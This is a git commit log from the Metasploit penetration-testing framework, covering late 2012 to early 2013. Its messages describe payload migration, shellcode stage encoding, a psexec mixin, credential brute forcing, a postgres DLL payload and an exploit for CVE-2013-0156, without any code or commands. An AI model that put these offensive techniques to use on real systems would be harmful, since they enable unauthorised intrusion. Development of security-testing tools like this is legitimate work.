James Lee 04adaf0e9d Unstupid the prepends callback
Windows#prepends was overriding PrependMigrate#prepends
2013-01-22 13:56:26 -06:00
James Lee 32aa2c6d9c Make asm spacing easier to read
Also adds a #prepends callback to Payload::Windows to make it a little
clearer what's happening.
2013-01-22 13:25:27 -06:00
Tasos Laskos fed4a836c6 Updated proof string for Web Differential Analysis
Manipulatable responses => Boolean manipulation
2013-01-22 20:29:57 +02:00
Royce Davis 81625121f2 Cleaned up some code spacing 2013-01-22 09:49:03 -06:00
Raphael Mudge 4740cb09a1 Fix NoMethodError if handler has no ParentModule
db.rb assumes that multi/handler sessions have a ParentModule defined
in their datastore. This assumption breaks when a user sets up a
multi/handler by hand to receive a session from another user (e.g.,
via multi_meter_inject).

When db.rb tries to access a member of a nil ParentModule, a
stacktrace is dumped to framework.log.
2013-01-22 02:56:43 -05:00
kernelsmith 52596ae3b4 add -R capability like hosts -R
moves the set_rhosts method def out into a separate file so it can be
included by both db.rb cmd_hosts and core.rb cmd_grep
2013-01-21 18:17:28 -06:00
jvazquez-r7 b2c7223108 Cleanup for mysql_file_enum.rb 2013-01-21 12:26:35 +01:00
Robin Wood 23d1eb7a80 File/dir brute forcer using MySQL 2013-01-20 21:23:58 +00:00
scriptjunkie 66d5f39057 Ensure prepend_migrate? always functions correctly. 2013-01-18 18:04:09 -06:00
scriptjunkie 6c046dfa69 Move PrependMigrate to a mixin 2013-01-18 17:45:36 -06:00
scriptjunkie 07bf36f62f Ensure shell still works if PrependMigrateProc fails to launch.
Don't rely on GetStartupInfoA return value.
2013-01-18 17:32:50 -06:00
scriptjunkie 52251867d8 Ensure Windows single payloads use payload backend
This means the singles that define their own assembly will use the payload backend to generate it.
2013-01-18 16:34:39 -06:00
scriptjunkie 16d065adfc Fix issue with singles.
Single now plays more nicely with other mixins, so PrependMigrate works.
2013-01-18 16:34:39 -06:00
scriptjunkie b01374904b tidy EOL spaces 2013-01-18 16:34:39 -06:00
scriptjunkie 15268cae73 Add X64 PrependMigrate support 2013-01-18 16:34:39 -06:00
scriptjunkie c97be836c3 Fix error calculating payload sizes.
Error meant most Windows payloads were marked as incompatible with many exploits.
2013-01-18 16:34:39 -06:00
scriptjunkie 725d4d7194 Re-use block_api code in migrate stub if possible
Makes payload significantly smaller.
2013-01-18 16:34:38 -06:00
scriptjunkie 0b32111a9f Revert "Revert "Merge branch 'migrator' of git://github.com/scriptjunkie/metasploit-framework into scriptjunkie-migrator""
This reverts commit 2436ac3a58.
2013-01-18 16:34:38 -06:00
Royce Davis a2f66a8fef Fixed msftidy complaints 2013-01-18 09:33:44 -06:00
Royce Davis 00a9c72595 Fixed exception handeling. No longer using rescure StandardError 2013-01-17 19:02:13 -06:00
kernelsmith 6e8e7a407d adds a .nil? check as well 2013-01-17 00:30:58 -06:00
kernelsmith 7090a4a82f adds check for empty data b4 sending to parser [RM7269]
[fixes RM7269]
we discussed the solution to this bug a lot on IRC and in the ticket
itself, the consensus was to fix it as far upstream as possible before
sending to the parsers so as to avoid any future bugs of the same
nature, so this commit adds a check to import_nmap_xml to see if the
data is empty before passing it on to the parser, whether that parser
is nokogiri or the legacy parser.
db_nmap -h now produces the expected output and db_nmap still works as
expected.
2013-01-17 00:18:13 -06:00
Royce Davis f7571d89de Fixed cleanup_after funciton to mimic file_dropper but not use file_dropper 2013-01-16 09:56:27 -06:00
sinn3r c621e83ffe Merge branch 'feature/stage_encoding' of github.com:jlee-r7/metasploit-framework into jlee-r7-feature/stage_encoding 2013-01-15 23:31:40 -06:00
Royce Davis 6773a10632 Made changes to cleanup to use file_dropper instead 2013-01-15 16:24:16 -06:00
James Lee 26b40666ce Merge branch 'rapid7' into feature/stage_encoding 2013-01-15 15:10:58 -06:00
Royce Davis 7361e1041f Merge commit '5e8f388ab8425bf2ef4c2fe33e6133b99ceb46d4' into psexec-mixin2 2013-01-15 14:49:21 -06:00
Royce Davis 6f17ed96db Merge https://github.com/rapid7/metasploit-framework into psexec-mixin2 2013-01-15 14:48:20 -06:00
James Lee af2b1ec25b Clean up doc comments 2013-01-15 14:22:11 -06:00
James Lee ee14c1c613 Merge remote-tracking branch 'R3dy/psexec-mixin2' into rapid7 2013-01-15 12:58:50 -06:00
James Lee 4883cf4b01 Minor doc comment additions 2013-01-15 12:49:43 -06:00
James Lee d36e38fca6 Move encoding into handle_connection
* Allows payloads that override generate_stage to still take advantage
  of stage encoding
* Also adds doc comments for a few methods
2013-01-15 10:34:31 -06:00
Tod Beardsley 6064dfcb71 Merge remote-tracking branch 'wchen-r7/fail_to_reload_fix' 2013-01-15 01:43:07 -08:00
James Lee a1e853500f Merge branch 'bug/optint_empty' into feature/stage_encoding 2013-01-14 15:50:39 -06:00
James Lee 21c18b78e6 Don't bother nil check, to_s handles it 2013-01-14 15:47:58 -06:00
James Lee 0c90171fa7 Deal with alread-normalized ints
[See #1308][See #1304]
2013-01-14 15:31:14 -06:00
James Lee fb19ec1005 Merge branch 'rapid7' into feature/stage_encoding 2013-01-14 15:20:23 -06:00
sinn3r b2ecb18a71 Allow OptInt to pass "" for special reasons
Cheap fix
2013-01-14 14:55:48 -06:00
James Lee bbb3fa25be Allow negative values for OptInt
[FixRM #7540]
2013-01-14 14:18:56 -06:00
James Lee b3b68c1b90 Make stage encoding possible
* Fixes a bug in shikata where input greater than 0xffff length would
  still use 16-bit counter
* Short circuits finding bad xor keys if there are no bad characters to
  avoid
* Fixes huge performance issue with large inputs to xor-based encoders
  due to the use of String#+ instead of String#<< in a loop. It now
  takes ~3 seconds on modern hardware to encode a 750kB buffer with
  shikata where it used to take more than 10 minutes. The decoding side
  takes a similar amount of time and will increase the wait between
  sending the second stage and opening a usable session by several
  seconds.

I believe this addresses the intent of pull request 905

[See #905]
2013-01-13 21:07:39 -06:00
James Lee 0d34e0b249 Fix regex for hex numbers 2013-01-13 20:53:40 -06:00
Spencer McIntyre b178ce1895 allow the mixin to auto detect an available decoder binary 2013-01-12 17:31:11 -05:00
James Lee 4703a6f737 Unbreak OptInt hex syntax
* Fix spec for no-longer-pending tests
* Fix regex in OptInt#valid? to allow hex syntax again

[See #1293][See #1296]
2013-01-12 14:17:29 -06:00
sinn3r b388f2357c Reset modules_cached flag when database disconnects 2013-01-12 00:08:30 -06:00
HD Moore 06fb8f5443 Merge pull request #1293 from wchen-r7/optint_valid
Fix OptInt's valid?() function
2013-01-11 17:29:27 -08:00
sinn3r 8c04df4a47 [FixRM: #7535] Missing normalize() in OptPort
[FixRM: #7535] - Sometimes OptPort can return as a String instead
of Fixnum because OptPort is missing the normalize() function.
2013-01-11 18:34:27 -06:00
sinn3r 0347b173eb Fix OptInt's valid?() function
[FixRM #7539] - The valid?() function will first normalize() the
user-supplied input before validation.  The problem is that the
normalize() function will ALWAYS convert data to integer, therefore
whatever you validate, you will always get true.  For example:
when I do "yomama".to_i, that returns 0, and of course will pass
integer validation.
2013-01-11 16:27:33 -06:00
Spencer McIntyre ce4aa606e7 change DECODER OptString to OptEnum per egypt's recommendation 2013-01-11 14:34:23 -05:00
sinn3r aa36b65aee [FixRM #7673] "Failed to reload" error.
When db_disconnect is issued, this funtion does not update the status
of self.migrated to false.  So when another reload command is used,
the update_module_details function will still try to connect to the
database, which causes the "Failed to reload" error.
2013-01-11 01:10:56 -06:00
Royce Davis b702263bbf Added fix form Eric Milam to simple.disconnect 2013-01-10 16:33:03 -06:00
Spencer McIntyre 4c87b1ba36 escape ticks and spaces in paths 2013-01-10 09:15:24 -05:00
HD Moore 4c1e501ed0 Exploit for CVE-2013-0156 and new ruby-platform modules 2013-01-09 23:10:13 -06:00
Royce Davis 13140d05b1 Added some methods for checkout output and cleanup 2013-01-09 21:14:19 -06:00
sinn3r a158611c95 Merge branch 'tasos-r7-web-modules' 2013-01-09 16:14:16 -06:00
sinn3r 8b25599feb Merge branch 'web-modules' of github.com:tasos-r7/metasploit-framework into tasos-r7-web-modules 2013-01-09 16:14:04 -06:00
jvazquez-r7 7a1a9985d5 Merge branch 'mysql_login_exceptions' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-mysql_login_exceptions 2013-01-09 18:21:03 +01:00
sinn3r 6490af720b Make failures more verbose so people know what's going on 2013-01-09 11:11:26 -06:00
Tasos Laskos 5ac6060fc1 Auxiliary::Web::HTTP_request: Updated to return an empty response on reset connections 2013-01-09 19:06:51 +02:00
Tasos Laskos 74cdd918af Auxiliary::Web::HTTP#run: don't allow connection or callback errors to abort the whole operation 2013-01-09 18:38:09 +02:00
Spencer McIntyre d79a3c8e6b list valid DECODER values and add the sshexec module 2013-01-09 10:27:22 -05:00
Royce Davis c262288541 Fixed msftidy issues 2013-01-08 15:35:20 -06:00
Royce Davis 3e1ea25207 Added Yard documentation 2013-01-08 15:20:13 -06:00
James Lee 95a95d45ec Fix importing msfxml files containing a session
[See #1179][SeeRM #7669]
2013-01-08 12:13:20 -06:00
Royce Davis c236e4e6e3 I took a stab at generating Yard documentation. I have never done it before... 2013-01-08 11:57:59 -06:00
Royce Davis 4fd196c0de Fixed typo, capitalization and column space 2013-01-08 11:52:40 -06:00
sinn3r 824bd84990 I forgot to add this exception 2013-01-07 18:06:39 -06:00
sinn3r fc48cc117d Merge branch 'bug/rm7665-netsparker-import' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7665-netsparker-import 2013-01-07 17:19:52 -06:00
James Lee a0e6c7043b Add actual cdata handler
Netsparker puts requests, responses, and info for vulns inside a cdata
(which makes sense because it's usually html snippets). This commit
handles that so report_web_vuln will actually be somewhat useful. Note
that the request is ignored by report_web_vuln despite there being a
place for it in the WebVuln model.

[SeeRM #7665]
2013-01-07 17:16:48 -06:00
sinn3r 5bc1066c69 Change how modules use the mysql login functions 2013-01-07 16:12:10 -06:00
sinn3r 261e095e5e Handle exceptions in mysql_login 2013-01-07 16:02:59 -06:00
sinn3r 268de941c7 Merge branch 'tasos-r7-web-modules' 2013-01-07 13:37:32 -06:00
sinn3r b53e8c794f Fix indent level 2013-01-07 13:36:55 -06:00
Royce Davis 7dd9d30363 Added a new mixin psexec.rb 2013-01-07 11:05:23 -06:00
Rob Fuller 986435c598 Fix typo
Typo found by @schierlm but mentioned after the commit of pull request #1187
Info: https://github.com/rapid7/metasploit-framework/pull/1187#commitcomment-2340457
2013-01-06 01:47:15 -05:00
Tasos Laskos e1885cab0b Merge remote-tracking branch 'upstream/master' into web-modules 2013-01-04 21:33:17 +02:00
Tasos Laskos 3d4d6e9860 Crawler aux mixin updated to catch the mysterious and anonymous timeout exception and re-raise it as a Timeout::Error 2013-01-04 21:32:18 +02:00
sinn3r d17a6f99e5 Merge branch 'feature/deprecated-module-mixin' of github.com:jlee-r7/metasploit-framework into jlee-r7-feature/deprecated-module-mixin 2013-01-04 00:38:01 -06:00
jvennix-r7 2f0e4cbd39 Merge pull request #1179 from rapid7/bug/bap-compro-hosts
Changes to BAP session storage
2013-01-03 14:27:13 -08:00
James Lee d9947a1515 Add a mixin for marking deprecated modules
* This mixin standardizes the previously ad-hoc deprecation warnings on
  modules that have been moved.

* Uses the mixin in 3 existing modules that already have (or should have
  had) deprecation warnings.
2013-01-02 19:14:44 -06:00
Spencer McIntyre 3c039327c0 include the new mixin 2013-01-02 13:41:57 -05:00
Spencer McIntyre 7aed6e44e1 Initial commit of the Bourne shell command stager, nothing uses it yet. 2013-01-02 13:28:08 -05:00
Daniele Martini dcae55e348 Give auth_brute ability to try credentials stored in db
Added two options:
DB_USER_PASS: this will try each user/pass couple stored in the db
DB_ADD_ALL: this will add each user and password to the lists.
By setting this to true, auth_brute will try every user with
every known password.
2012-12-28 18:55:05 +01:00
sinn3r d2dc7ebc2d Merge branch 'feature/windows-postgres-payload-dll' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-feature/windows-postgres-payload-dll 2012-12-26 11:18:21 -06:00
Tod Beardsley 179e4cf870 Moving up to 4.6.0-dev 2012-12-24 08:40:29 -06:00
James Lee 20cc2fa38d Make Windows postgres_payload more generic
* Adds Exploit::EXE to windows/postgres/postgres_payload. This gives us
  the ability to use generate_payload_dll() which generates a generic dll
  that spawns rundll32 and runs the shellcode in that process. This is
  basically what the linux version accomplishes by compiling the .so on
  the fly. On major advantage of this is that the resulting DLL will
  work on pretty much any version of postgres

* Adds Exploit::FileDropper to windows version as well. This gives us
  the ability to delete the dll via the resulting session, which works
  because the template dll contains code to shove the shellcode into a
  new rundll32 process and exit, thus leaving the file closed after
  Postgres calls FreeLibrary.

* Adds pre-auth fingerprints for 9.1.5 and 9.1.6 on Ubuntu and 9.2.1 on
  Windows

* Adds a check method to both Windows and Linux versions that simply
  makes sure that the given credentials work against the target service.

* Replaces the version-specific lo_create method with a generic
  technique that works on both 9.x and 8.x

* Fixes a bug when targeting 9.x; "language C" in the UDF creation query
  gets downcased and subsequently causes postgres to error out before
  opening the DLL

* Cleans up lots of rdoc in Exploit::Postgres
2012-12-22 00:30:09 -06:00
sinn3r 9b768a2c62 Merge branch 'cleanup/post-windows-services' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-cleanup/post-windows-services 2012-12-21 23:42:17 -06:00
David Maloney be7da83feb Adds EHLO domain to smtp deliver
Allow the user to set the EHLO domain for the smtp deliver module.
This is needed for Pro functionality

[story #41549217]
2012-12-21 14:22:21 -06:00
Tod Beardsley 2bb7b5ea11 Fixes error message for badchar
Note that only a custom module that allows for users to pass arguments
to nmap would be capable of hitting the error condition. Right now, only
auxiliary/scanner/oracle/oracle_login traverses the codepath, and that
doesn't allow for arbitrary args passed to nmap.

So... without contriving an example, it should be impossible to
experience or test.

[FixRM #7641]
2012-12-21 09:59:54 -06:00
sinn3r be85cf54ab Why in a quote? 2012-12-20 10:47:23 -06:00
Sherif Eldeeb f0991f3b3b make "resp.body" as an advanced option
created a new advanced option "HttpUknownRequestResponse" that will be sent back in the HTML body of unknown requests instead of the old static "No site configured at this address" message.
2012-12-20 12:35:00 +03:00
sinn3r 4b56e3c862 Merge branch 'tasos-r7-web-modules' 2012-12-18 10:38:00 -06:00
Tod Beardsley 10511e8281 Merge remote branch 'origin/bug/fix-double-slashes'
Ran the new normalize_uri() specs, all passes, so I'm quite confident in
this change.
2012-12-17 13:29:19 -06:00
Samuel Huckins 4f3c6f973d Changes to BAP session storage.
[SEERM #7294]
[Bug #40937817]

* exploit/multi/handler no longer filtered out from vuln creation and
other steps
* Name changed to parent module's name in session storage so we show something more helpful
than generic handler
* Same for vuln and attempt creation
2012-12-13 15:35:34 -06:00
sinn3r f81ef9b68e Merge branch 'bug/reload_all' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-bug/reload_all 2012-12-13 12:33:39 -06:00
James Lee d7f6b0c373 Remove vestiges of ModuleManager's ModuleSet origins 2012-12-13 11:23:49 -06:00
sinn3r c0b214c287 Merge branch 'bindaddress' of git://github.com/corelanc0d3r/metasploit-framework into corelanc0d3r-bindaddress 2012-12-13 02:06:23 -06:00
Tod Beardsley e762ca0d9b Merge remote branch 'jlee-r7/midnitesnake-postgres_payload' 2012-12-12 15:30:56 -06:00
Tod Beardsley 0d8d5baf6d Resolve merge conflict from jlee-r7 2012-12-12 14:24:47 -06:00
James Lee 6b4e021607 Make ModuleManager Enumerable
Fixes tools/module_* and probably some other lurking bugs
2012-12-12 13:41:04 -06:00
James Lee a673c363fd Use a more descriptive variable name
Also removes commented-out code.
2012-12-10 13:36:09 -06:00
James Lee bc7cd4b452 Loop through module sets like super used to do
... since super doesn't exist any more.

Also changes to using ModuleSet#[] inside ModuleManager#[] instead of
ModuleSet#create to mimic original behavior when ModuleManager was a
subclass of ModuleSet.
2012-12-05 12:59:35 -06:00
Tasos Laskos 62782f0273 Auxiliary::Web::Fuzzable: removed confusing HTTP response status messages [SEERM #7586] 2012-12-05 18:49:07 +02:00
James Lee 77af4ba559 Missed a file in previous commit, thanks, travis! 2012-12-03 22:37:50 -06:00
James Lee f4476cb1b7 Really fix payload recalculation
Instead of deleting all non-symbolics before the re-adding phase of
PayloadSet#recalculate, store a list of old module names, populate a
list of new ones during the re-adding phase, and finally remove any
non-symbolic module that was in the old list but wasn't in the new list.

Also includes a minor refactoring to make ModuleManager its own thing
instead of being an awkard subclass of ModuleSet. Now PayloadSet doesn't
need to know about the existence of framework.modules, which makes the
separation a little more natural.

[FixRM #7037]
2012-12-03 22:23:40 -06:00
Tasos Laskos beffd1feda Auxiliary::Web::Analysis::Taint#taint_analysis: added a bit of differential logic to avoid false positives in case the default responce matches the pattern we're looking for [FIXRM #7559] 2012-12-04 00:09:54 +02:00
Tasos Laskos dafa984166 Auxiliary::Web::Fuzzable#submit: bugfixed to call http.request instead of http.request_async 2012-12-04 00:06:17 +02:00
Tasos Laskos f6c27a4494 Auxiliary::Web#find_proof: updated doc comments 2012-12-04 00:05:12 +02:00
HD Moore 3ae47e2089 Move the thread tracking into the update method 2012-12-02 01:07:40 -06:00
HD Moore 51673ca152 Search reference values as well (ms08-067,etc) 2012-12-02 00:44:25 -06:00
HD Moore f17ea91d7c Whitespace changes only 2012-12-02 00:44:03 -06:00
James Lee bc63ee9c46 Merge branch 'jvazquez-r7-file_dropper_support_local' into rapid7 2012-11-30 13:43:02 -06:00
James Lee 1da3388194 Fix missing require
[Closes #1106]
2012-11-30 13:42:31 -06:00
HD Moore fee6ad9799 Bump to 4.5.0-release for testing 2012-11-30 11:04:23 -08:00
jvazquez-r7 087ff328b6 correct comments documentation 2012-11-28 22:18:56 +01:00
jvazquez-r7 17518f035c support for local exploits on file_dropper 2012-11-28 22:17:27 +01:00
Tod Beardsley 95f084b296 Use cvedetails not mitre. 2012-11-28 13:24:08 -06:00
James Lee 17d8d3692b Merge branch 'rapid7' into midnitesnake-postgres_payload 2012-11-27 11:14:54 -06:00
Tasos Laskos 26b3b4577d Merge remote-tracking branch 'upstream/master' into web-modules 2012-11-21 23:57:42 +02:00
Tasos Laskos b656554769 Exploit::Remote::Web: moved status printing calls out of #perform_request and into #exploit 2012-11-21 23:28:26 +02:00
HD Moore f5c7f4c41a Remove trailing whitespace 2012-11-19 19:42:22 -06:00
sinn3r 527ba0e401 Merge branch 'feature/automatic-fs-cleanup' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-feature/automatic-fs-cleanup 2012-11-19 15:59:19 -06:00
James Lee 2526dce20a Add attrib.exe for removing read-only files
This really should be a standard part of session.fs.file.rm
2012-11-19 15:18:03 -06:00
sinn3r d4749ff009 Merge branch 'feature/automatic-fs-cleanup' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-feature/automatic-fs-cleanup 2012-11-16 19:02:46 -06:00